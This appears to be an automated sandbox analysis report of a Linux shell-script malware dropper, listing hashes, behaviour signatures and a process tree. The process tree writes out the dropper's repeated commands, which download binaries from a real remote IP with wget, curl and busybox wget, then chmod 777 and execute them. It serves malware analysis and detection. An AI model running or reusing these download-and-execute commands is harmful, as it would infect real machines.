Analysis
-
max time kernel
69s -
max time network
71s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
-
MD5
d08f4f01c6ec9c67ead46ab98f031a55
-
SHA1
cac804b670bc7011aff98353a06d5906917e496a
-
SHA256
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
-
SHA512
be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
-
SSDEEP
192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 897 chmod 969 chmod 951 chmod 728 chmod 879 chmod 933 chmod 939 chmod 861 chmod 957 chmod 885 chmod 891 chmod 804 chmod 909 chmod 825 chmod 867 chmod 915 chmod 945 chmod 921 chmod 963 chmod 735 chmod 759 chmod 873 chmod 903 chmod 785 chmod 810 chmod 855 chmod 927 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c 729 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 736 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA 742 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL 761 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD 786 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj 805 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs 811 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 827 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp 856 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN 862 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z 868 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h 874 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a 880 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP 886 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP 892 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h 898 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a 904 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c 910 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 916 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD 922 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj 928 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA 934 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL 940 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp 946 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN 952 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z 958 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs 964 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 970 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN curl File opened for modification /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z curl File opened for modification /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL curl File opened for modification /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h curl File opened for modification /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 curl File opened for modification /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj curl File opened for modification /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp curl File opened for modification /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 curl File opened for modification /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA curl File opened for modification /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj curl File opened for modification /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs curl File opened for modification /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP curl File opened for modification /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a curl File opened for modification /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs curl File opened for modification /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD curl File opened for modification /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN curl File opened for modification /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c curl File opened for modification /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 curl File opened for modification /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp curl File opened for modification /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h curl File opened for modification /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP curl File opened for modification /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c curl File opened for modification /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA curl File opened for modification /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD curl File opened for modification /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z curl File opened for modification /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 curl File opened for modification /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a curl File opened for modification /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL curl
Processes
-
/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:708
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:727
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:734
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:740
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:754
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:781
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:803
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:809
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:819
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:850
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:860
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:866
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:872
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:878
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:884
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:890
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:896
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:902
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:908
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:914
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:920
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:926
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:928
-
-
